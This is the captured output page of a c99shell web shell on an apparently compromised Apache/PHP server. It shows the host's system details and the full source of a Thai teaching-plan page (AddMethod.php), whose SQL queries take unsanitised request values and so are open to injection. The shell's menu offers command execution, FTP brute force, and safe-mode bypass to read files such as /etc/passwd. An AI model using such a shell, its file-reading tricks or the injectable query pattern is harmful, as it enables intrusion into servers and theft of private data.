!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/manage/directorBCNU/   drwxr-xr-x
Free 51 GB of 127.8 GB (39.9%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     AddMethod.php (16.19 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

    session_start
();
    
    
/**  Define Validate Access  */
    
define'_VALID_ACCESS');

    
/**  Check Session User Login  */
    
if( !session_is_registered("valid_user") && !session_is_registered("Priority") ) {
        echo 
"<meta http-equiv=\"Content-Type\" content=\"text/html; charset=windows-874\" />";
        echo 
"<p style=padding-top:115px><p align=center><br /><font color=red><strong>กรุณาทำการ Login ก่อน</strong></font></p></p>";
        echo 
"<meta http-equiv=\"refresh\" content=\"1; URL=../login.php\" />";
        exit();
    } 
    else {
        
/**  Configuration  */
        
require_once( "../configuration.php" );
        require_once( 
$_Config_absolute_path "/includes/framework.php" );
        require_once( 
"../includes/Function.php" );
    
        
/**  Create Database Object  */
        
$dbObj = new DBConn;

        
//=== SESSION
        
$Username $valid_user
        
        
        
/**  Config Table for This Page  */
        
$myTable1 "personal_tb";
        
$myTable2 =" tech_courseteacher "
        
/**  Table  -->  personal_tb  */
        //$query1 = " SELECT *  FROM $myTable2  WHERE  courseId ='$courseId'  and  costtId='$costtId'  And  Teacher_code='$Teacher_code'  ";
        //$result1 = $dbObj->execQuery($query1);
        //$rs1= $dbObj->fetchArray($result1);
        
        //$courseId = $rs1['courseId'];
        
$query " SELECT *, prefixName as First_name FROM personal_tb LEFT JOIN prefix ON personal_tb.First_name = prefix.prefixId WHERE  Teacher_code='$Teacher_code'   ";
        
$result3 $dbObj->execQuery($query);
        
$rss$dbObj->fetchArray($result3);
        
    
    } 
# else
 
?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=windows-874" />
<link href="../css/default.css" rel="stylesheet" type="text/css" />
<script language="javascript" src="../js/utilities.js"></script>
<script type="text/javascript" src="../js/calendarDateInput2.js"></script>
<script language="javascript">
function checkData() {
var formObj = document.myForm;
    if( (formObj.Week.value == "" ) && (formObj.Content.value == "" ) && (formObj.Unit.value == "" ) ) { alert("กรุณากรอกข้อมูลให้ครบด้วยค่ะ" ); formObj.Hour.style.backgroundColor='#F1F9FC'; formObj.LearnAactive.focus();    return false; }
    else if(formObj.Week.value == "" ) { alert("กรุณากรอก รหัสวิชา"); formObj.Week.style.backgroundColor='#F1F9FC'; formObj.Week.focus(); return false;} 
    else if(formObj.Unit.value == "" ) { alert("กรุณากรอก ชื่อวิชา"); formObj.Unit.style.backgroundColor='#F1F9FC'; formObj.courseName.focus(); return false;} 
    else if(formObj.courseUnit.value == "" ) { alert("กรุณากรอก หน่วยกิจ"); formObj.courseUnit.style.backgroundColor='#F1F9FC'; formObj.Unit.focus(); return false;} 
    else if(formObj.Week.value == "" ) { alert("กรุณากรอก จำนวนนักศึกษา"); formObj.Week.style.backgroundColor='#F1F9FC'; formObj.Week.focus(); return false;}
    else if(formObj.Total_hour.value == "" ) { alert("กรุณากรอก จำนวนชั่วโมง"); formObj.Total_hour.style.backgroundColor='#F1F9FC'; formObj.Total_hour.focus(); return false;}
    
    else if(formObj.Objective.value == "" ) { alert("กรุณากรอก วัตถุประสงค์"); formObj.Objective.style.backgroundColor='#F1F9FC'; formObj.Objective.focus(); return false;}
    else return true ;
}
</script>
<script language="JavaScript" type="text/JavaScript">
function browse()
{
    myForm.Filetex.src = myForm.Filetex.value;
}
</script>
<title>ข้อมูลทั่วไปบุคลากร - ข้อมูลแผนการสอน - เพิ่มข้อมูลแผนการสอน</title>
</head>

<body topmargin="0" rightmargin="0" bottommargin="0" leftmargin="0">
<?php
    
include("../templates/incHeader.php");
?>
<table width="1003" border="0" cellspacing="0" cellpadding="0">
  <tr>
    <td width="203" align="left" valign="top" style="padding:10px 0px 0px 5px"><?php include("./_incMainMenu.php");?></td>
    <td width="800" height="440" align="center" valign="top" style="padding:10px 0px 5px 10px"><fieldset>
     <table width="780" border="0" cellspacing="0" cellpadding="0">
      <form id="myForm" name="myForm" method="post"   enctype="multipart/form-data" action="InsertMethod.php?Teacher_code=<?=$Teacher_code;?>&costtId=<?=$costtId ;?>&courseId=<?=$courseId ;?>&programId=<?=$programId ;?>" onSubmit="return checkData()">
      <tr>
        <td height="5"></td>
      </tr>
      <tr>
        <td height="30" background="../images/background/bg-head-topic-w780.gif" class="PADDING-LEFT-10"><strong><a href="index.php">หน้าหลัก</a></strong> <strong>&raquo; <a href="CourseMethodTeach.php?Teacher_code=<?=$Teacher_code;?>&costtId=<?=$costtId?>&courseId=<?=$courseId ;?>&programId=<?=$programId ;?>">ข้อมูลแผนการสอน มคอ ๓</a> &raquo; <span class="NOTE">บันทึกแผนการสอนตาม มคอ ๓</span></strong></td>
        </tr>
      <tr>
        <td>&nbsp;</td>
      </tr>
      <tr>
        <td><span class="PADDING-TOP-10 PADDING-BOTTOM-10"><img src="../images/icons/arrow-circle-225-left.png" width="16" height="16" border="0" align="absmiddle" /> <a href="javascript:;" onclick="window.history.back();"><strong>&lsaquo; ย้อนกลับ</strong></a></span></td>
      </tr>
      <tr>
        <td align="center"><table width="750" border="0" align="center" cellpadding="1" cellspacing="3" bgcolor="#EEEEEE" style="border:1px solid #EEEEEE">
          <tr bgcolor="#D3E4F8">
            <td height="5" colspan="2" bgcolor="#FFFFFF">&nbsp;</td>
          </tr>
          <tr bgcolor="#eeeeee">
            <td width="23%" align="right"  bgcolor="#FFFFFF" class="TEXT-DARK-BLUE10">อาจารย์:</td>
            <td width="76%" bordercolor="#CCCCCC" bgcolor="#FFFFFF">
            <?
            $query 
" SELECT *, prefixName as First_name FROM personal_tb LEFT JOIN prefix ON personal_tb.First_name = prefix.prefixId WHERE  Teacher_code='$Teacher_code'   ";
            
$result3 $dbObj->execQuery($query);
            
$rss4$dbObj->fetchArray($result3);
            echo  
$rss4['First_name'] . $rss4['Teacher_name'] ." &nbsp;"$rss4['Teacher_lastname']  ;
            
?>
              <input type="hidden" name="Teacher_code" value="<? echo $rss4['Teacher_code']; ?>" /></td>
          </tr>
          <tr bgcolor="#eeeeee">
            <td align="right"  bgcolor="#FFFFFF" class="TEXT-DARK-BLUE10">สถานะการสอน:</td>
            <td bordercolor="#CCCCCC" bgcolor="#FFFFFF"><? 
                    $sql 
" SELECT * FROM  tech_courseteacher    WHERE  costtId ='$costtId'    ";
                    
$result3 mysql_query($sql);
                    
$rss3mysql_fetch_array($result3);
                      echo 
$rss3['CourseTeach'] ;?>
               ปีการศึกษา 
                <?=$rss3['acadYear'] ; ?> <input name="acadYear" type="hidden" id="acadYear" value="<?=$rss3['acadYear'] ; ?>" /></td>
          </tr>
          <tr bgcolor="#eeeeee">
            <td align="right"  bgcolor="#FFFFFF" class="TEXT-DARK-BLUE10">รายวิชา:</td>
            <td bordercolor="#CCCCCC" bgcolor="#FFFFFF"><?php
                    $dbObj
->RegDBConn();

                    
$strSQL33 " SELECT * FROM  Course   WHERE  courseId='$courseId' ";
                    
$result33 mysql_query($strSQL33);
                    
$rs33 mysql_fetch_array($result33);
                
?>
              <input name="courseCode" type="text" class="input1" style="text-align:center" value="<?=$rs33['courseCode'];?>" size="7" readonly="readonly" />
              <input name="courseId" type="hidden" id="courseId" value="<?php echo $rs33["courseId"] ;?>" />
              <input name="courseName" type="text" class="input1" value="<?=$rs33['courseName'];?>" size="48" readonly="readonly" />
              <input name="courseUnit" type="text" class="input1" style="text-align:center" value="<?=$rs33['courseUnit'];?>" size="7" readonly="readonly" /></td>
          </tr>
          <tr>
            <td height="22" align="right" bgcolor="#FFFFFF" class="TEXT-DARK-BLUE10">หลักสูตร:</td>
            <td bgcolor="#FFFFFF">
              <?php

                $sql 
" SELECT *  FROM    Program    WHERE   programId='$programId'    ";
                
$result4$dbObj->execQuery($sql);
                
$rs4$dbObj->fetchArray($result4);
            
//    $dbObj->freeresult($result2);
                
echo $rs4['programName'];

                
$dbObj->DBConn();
            
?>
            </span>
            <input name="programId" type="hidden" id="programId" value="<? echo $rs4['programId']; ?>" /></td>
          </tr>
          <tr>
            <td height="22" align="right" bgcolor="#FFFFFF" class="TEXT-DARK-BLUE10">สัปดาห์ที่:</td>
            <td bgcolor="#FFFFFF"><input name="Week" type="text" class="input1" id="Week" style="text-align:center" value="<?=$rss['Unit'];?>" size="3" maxlength="3" onkeypress="return checkNumeric(); " /></td>
          </tr>
          <tr>
            <td height="22" align="right" bgcolor="#FFFFFF" class="TEXT-DARK-BLUE10">วันที่เริ่มสอน:</td>
            <td bgcolor="#FFFFFF"><script>DateInput('Date_start', true,'DD/MM/YYYY','<?=(isset($rs1["Date_start"]))?ymdT2dmyE($rs1["Date_start"]):date("d/m/Y");?>');</script></td>
          </tr>
          <tr>
            <td height="22" align="right" bgcolor="#FFFFFF" class="TEXT-DARK-BLUE10">จำนวนชั่วโมง:</td>
            <td bgcolor="#FFFFFF"><input name="Hour" type="text" class="input" id="Hour" style="text-align:center" value="<?=$rss['Unit'];?>" size="3" maxlength="5" onkeypress="return checkNumeric(); " />
               </font></td>
          </tr>
          <tr bgcolor="#eeeeee">
            <td align="right" valign="top" bgcolor="#FFFFFF" class="TEXT-DARK-BLUE10">หน่วยการเรียนรู้:</td>
            <td bordercolor="#CCCCCC" bgcolor="#FFFFFF">&nbsp;</td>
          </tr>
          <tr bgcolor="#eeeeee">
            <td align="right" valign="top" bgcolor="#FFFFFF" class="TEXT-DARK-BLUE10">&nbsp;</td>
            <td bordercolor="#CCCCCC" bgcolor="#FFFFFF"><textarea name="Unit" cols="90" rows="5" id="Unit"><?=$rss['Unit'];?>
            </textarea> <script>QBPATH='../editor'; VISUAL=1; SECURE=0;</script>
                       <script src='../editor/quickB.js'></script> 
                      <script src='../editor/tabedit.js'></script></td>
          </tr>
          <tr bgcolor="#eeeeee">
            <td colspan="2" align="left" valign="top"  bgcolor="#FFFFFF" class="TEXT-DARK-BLUE10">ระดับหน่วยการเรียนรู้/
              วัตถุประสงค์:</td>
            </tr>
          <tr bgcolor="#eeeeee">
            <td align="right" valign="top"  bgcolor="#FFFFFF" class="TEXT-DARK-BLUE10">&nbsp;</td>
            <td bordercolor="#CCCCCC" bgcolor="#FFFFFF"><textarea name="Objective" cols="90" rows="5" id="Objective"><?=$rss['Unit'];?>
            </textarea> <script>QBPATH='../editor'; VISUAL=1; SECURE=0;</script>
                       <script src='../editor/quickB.js'></script> 
                      <script src='../editor/tabedit.js'></script></td>
          </tr>
          <tr bgcolor="#eeeeee">
            <td align="right" valign="top"  bgcolor="#FFFFFF" class="TEXT-DARK-BLUE10">เนื้อหา(หัวข้อ):</td>
            <td bordercolor="#CCCCCC" bgcolor="#FFFFFF">&nbsp;</td>
          </tr>
          <tr bgcolor="#eeeeee">
            <td align="right" valign="top"  bgcolor="#FFFFFF" class="TEXT-DARK-BLUE10">&nbsp;</td>
            <td bordercolor="#CCCCCC" bgcolor="#FFFFFF"><textarea name="Content" cols="90" rows="5" id="Content"><?=$rss['Unit'];?>
            </textarea> <script>QBPATH='../editor'; VISUAL=1; SECURE=0;</script>
                       <script src='../editor/quickB.js'></script> 
                      <script src='../editor/tabedit.js'></script></td>
          </tr>
          <tr bgcolor="#eeeeee">
            <td colspan="2" align="left" valign="top"  bgcolor="#FFFFFF" class="TEXT-DARK-BLUE10">แนวทางในการปรับปรุงและพัฒนา:</td>
            </tr>
          <tr bgcolor="#eeeeee">
            <td align="right" valign="top"  bgcolor="#FFFFFF" class="TEXT-DARK-BLUE10">&nbsp;</td>
            <td bordercolor="#CCCCCC" bgcolor="#FFFFFF"><textarea name="LearnAactive" cols="90" rows="5" id="Learning activities"><?=$rss['Unit'];?>
            </textarea> <script>QBPATH='../editor'; VISUAL=1; SECURE=0;</script>
                       <script src='../editor/quickB.js'></script> 
                      <script src='../editor/tabedit.js'></script></td>
          </tr>
          <tr bgcolor="#eeeeee">
            <td align="right" valign="top"  bgcolor="#FFFFFF" class="TEXT-DARK-BLUE10">&nbsp;</td>
            <td bordercolor="#CCCCCC" bgcolor="#FFFFFF">&nbsp;</td>
          </tr>
          <tr bgcolor="#eeeeee">
            <td align="right" valign="top"  bgcolor="#FFFFFF" class="TEXT-DARK-BLUE10">วิธีการวัดและประเมินผล:</td>
            <td bordercolor="#CCCCCC" bgcolor="#FFFFFF"><table width="95%" border="0" cellpadding="0" cellspacing="0" bgcolor="#EEEEEE">
              <tr bgcolor="#eeeeee">
                <td width="29%" height="18" bgcolor="#FFFFFF">
                  <label>
                    <input name="Aess1" type="checkbox" id="Aess1" <?php if (!(strcmp("$rss[Aess1]","แบบทดสอบ"))) {echo "checked";} ?> value="แบบทดสอบ" />
                    </label>
                  แบบทดสอบ</font></td>
                <td width="71%" bgcolor="#FFFFFF"><font face="Tahoma">คะแนน
                  <input name="Asses1" type="text" id="Asses1" style="text-align:center" onkeypress="return checkNumeric();" value="<?=$rss['Unit'];?>" size="5" maxlength="3" />
                  </font></td>
                </tr>
              <tr bgcolor="#eeeeee">
                <td height="18" bgcolor="#FFFFFF"><font face="Tahoma"> 
                  <input name="Aess2" type="checkbox" id="Aess2"<?php if (!(strcmp("$rss[Aess2]","ชิ้นงาน/รายงาน"))) {echo "checked";} ?> value="ชิ้นงาน/รายงาน" />
                  ชิ้นงาน/รายงาน</font></td>
                <td bgcolor="#FFFFFF"><font face="Tahoma">คะแนน</font>
                  <input name="Asses2" type="text" id="Asses2" style="text-align:center" onkeypress="return checkNumeric();" value="<?=$rss['Unit'];?>" size="5" maxlength="3" /></td>
                </tr>
              <tr bgcolor="#eeeeee">
                <td height="18" bgcolor="#FFFFFF"><font face="Tahoma"> 
                  <input name="Aess3" type="checkbox" id="Aess3"<?php if (!(strcmp("$rss[Aess3]","บบประเมินจิตวิสัย"))) {echo "checked";} ?> value="แบบประเมินจิตวิสัย" />
                  แบบประเมินจิตวิสัย</font></td>
                <td bgcolor="#FFFFFF"><font face="Tahoma">คะแนน</font>
                  <input name="Asses3" type="text" id="Asses3" style="text-align:center" onkeypress="return checkNumeric();" value="<?=$rss['Unit'];?>" size="5" maxlength="3" /></td>
                </tr>
              <tr bgcolor="#eeeeee">
                <td height="18" bgcolor="#FFFFFF">&nbsp;</td>
                <td bgcolor="#FFFFFF">&nbsp;</td>
                </tr>
              </table></td>
          </tr>
          <tr bgcolor="#E5E5E5" class="BORDER-GREY-LIGHT" >
            <td align="right" bgcolor="#FFFFFF" class="TEXT-DARK-BLUE10">&nbsp;</td>
            <td align="left" bgcolor="#FFFFFF">&nbsp;</td>
          </tr>
          <tr bgcolor="#E5E5E5" class="BORDER-GREY-LIGHT" >
            <td align="right" bgcolor="#FFFFFF" class="TEXT-DARK-BLUE10">อัพโหลดไฟล์เอกสาร:</td>
            <td align="left" bgcolor="#FFFFFF"><input name="Filetex" type="file" id="Filetex" size="20" /></td>
          </tr>
          <tr>
            <td bgcolor="#FFFFFF" align="center">&nbsp;</td>
            <td bgcolor="#FFFFFF">&nbsp;</td>
          </tr>
          <tr>
            <td bgcolor="#FFFFFF" align="center">&nbsp;</td>
            <td bgcolor="#FFFFFF"><input type="submit" name="Submit" value="บันทึก" class="WIDTH60 CURSOR-HAND" />
              &nbsp;
              <input type="reset" name="Reset" value="รีเซ็ต" class="WIDTH60 CURSOR-HAND" />
              &nbsp;&nbsp;
              <input type="button" name="Button" value="ยกเลิก" class="WIDTH60 CURSOR-HAND" onclick="location.href='PlanList.php?Teacher_code=<?=$Teacher_code;?>'" />
              <input name="costtId" type="hidden" id="costtId" value="<?=$costtId ?>" /></td>
          </tr>
          <tr>
            <td bgcolor="#FFFFFF" align="center">&nbsp;</td>
            <td bgcolor="#FFFFFF">&nbsp;</td>
          </tr>
        </table></td>
      </tr>
      <tr>
        <td>&nbsp;</td>
      </tr></form>
    </table>
   </fieldset></td>
  </tr>
</table>
<?php include("../templates/incFooter.php"); ?>
</body>
</html>
<?php
    
/**  Free Resource */
    
$dbObj->freeresult($result1);
    
    
/**  Close the Database  */
    
$dbObj->disconn();
    
    
/**  Unset Class  */
    
unset($dbObj);
?>

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0132 ]--